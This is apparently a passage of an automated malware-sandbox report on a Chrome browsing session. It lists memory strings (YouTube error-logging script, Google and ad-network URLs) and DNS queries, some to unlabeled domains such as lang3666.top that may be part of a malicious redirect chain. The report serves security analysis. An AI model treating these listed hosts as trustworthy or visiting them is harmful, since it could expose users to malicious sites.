values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}application/json equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2485699742.000028EC0384C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}D equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}"} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}:false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getTabUrl"}ource":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}iM equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: |https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRator equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}ne":true,"dynamic":fale} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495185106.000028EC047AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488392167.000028EC03CA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} B equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: fountainofhealth.ca
Source: global traffic | DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic | DNS traffic detected: DNS query: islonline.org
Source: global traffic | DNS traffic detected: DNS query: lang3666.top
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: www.youtube.com
Source: global traffic | DNS traffic detected: DNS query: i.ytimg.com
Source: global traffic | DNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global traffic | DNS traffic detected: DNS query: static.doubleclick.net
Source: global traffic | DNS traffic detected: DNS query: yt3.ggpht.com
Source: global traffic | DNS traffic detected: DNS query: play.google.com
Source: global traffic | DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic | DNS traffic detected: DNS query: windomstatetheater.com
Source: global traffic | DNS traffic detected: DNS query: beacons.gvt2.com
Source: global traffic | DNS traffic detected: DNS query: beacons2.gvt2.com
Source: global traffic | DNS traffic detected: DNS query: beacons3.gvt2.com
Source: global traffic | DNS traffic detected: DNS query: beacons4.gvt2.com
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS0
                                  Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tinyurl.com/da2oa9
                                  Source: chrome.exe, 00000000.00000003.2333546144.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333473704.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335007919.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330812480.000028EC05D3B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335098135.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335034183.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333463397.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc1950
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/kiabhabj
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0/niikhdga
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eei
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindgg
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/l4z3clyi7urxnsu2inhaenyzam_2025.5.20.1303/ggkkehg
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/dl/release2/chrome_component/l7xtcygg3vebugalfkm3b3dp3u_6.7431.9692/pkomkdjpmj
                                  Source: chrome.exe, 00000000.00000002.2503232175.000028EC07364000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatwg.org/specs/web-apps/current-work/multipage/commands.html#the-di
                                  Source: chrome.exe, 00000000.00000002.2503232175.000028EC07364000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatwg.org/specs/web-apps/current-work/multipage/commands.html#the-dilog-ele
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/watch?v
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://youtube.com/drm/2012/10/10
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://youtube.com/streaming/metadata/segment/102015
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://a-mo.net
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486301784.000028EC03948000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330950163.000028EC044A1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330950163.000028EC044A1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://acxiom.com
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ad.doubleclick.net/activity;
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ad.doubleclick.net/activity;register_conversion=1;
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ade.googlesyndication.com/ddm/activity/
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/pagead/regclk?
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://adsmeasurement.com
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://adtrafficquality.google
                                  Source: chrome.exe, 00000000.00000003.2333546144.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333473704.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335007919.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335098135.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335034183.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333463397.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://angular.dev/license
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apex-football.com
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://atomex.net
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://audienceproject.com
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://beaconmax.com
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blog.alexmaccaw.com/css-transitions
                                  Source: chrome.exe, 00000000.00000003.2301920756.000028EC04738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302499245.000028EC027CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cct.google/taggy/agent.js
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472432149.000028EC028C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314832762.000028EC03E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315162936.000028EC05CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478797391.000028EC03124000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
                                  Source: chrome.exe, 00000000.00000003.2301202727.000028EC06240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474190232.000028EC02B3C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473488281.000028EC02A6C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2468969997.000028EC0238C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                                  Source: chrome.exe, 00000000.00000002.2494870504.000028EC04694000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495137392.000028EC047A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487830908.000028EC03C14000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301889387.000028EC06CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478072951.000028EC03020000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480846916.000028EC03334000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                                  Source: chrome.exe, 00000000.00000002.2441041835.000001E4AE417000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enle-bar?paramsencoded=
                                  Source: chrome.exe, 00000000.00000003.2314933821.000028EC077D5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301202727.000028EC06240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                                  Source: chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
                                  Source: chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                                  Source: chrome.exe, 00000000.00000002.2474400651.000028EC02B68000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474751970.000028EC02BE4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469526072.000028EC02404000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2468969997.000028EC0238C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                                  Source: chrome.exe, 00000000.00000002.2480935660.000028EC03344000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474751970.000028EC02BE4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481132877.000028EC0335C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
                                  Source: chrome.exe, 00000000.00000003.1856722271.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1816499766.000028EC06B58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1937842158.000028EC04700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467012546.000028EC02204000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1937804335.000028EC03840000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1816526769.000028EC04AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1897512538.000028EC06CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856752469.000028EC049D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/uma/v2
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://creative-serving.com
                                  Source: chrome.exe, 00000000.00000002.2489165634.000028EC03E44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://csp.H
                                  Source: chrome.exe, 00000000.00000002.2489165634.000028EC03E44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://csp.with
                                  Source: chrome.exe, 00000000.00000002.2489165634.000028EC03E44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://csp.withcsp.with
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482084974.000028EC03404000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:99:0
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC5D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:99:0
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:99:0cross-origin-opener-policy-report-only:sam
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dailymotion.com
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/kiabhabjdbk
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0/niikhdgajlp
                                  Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpn
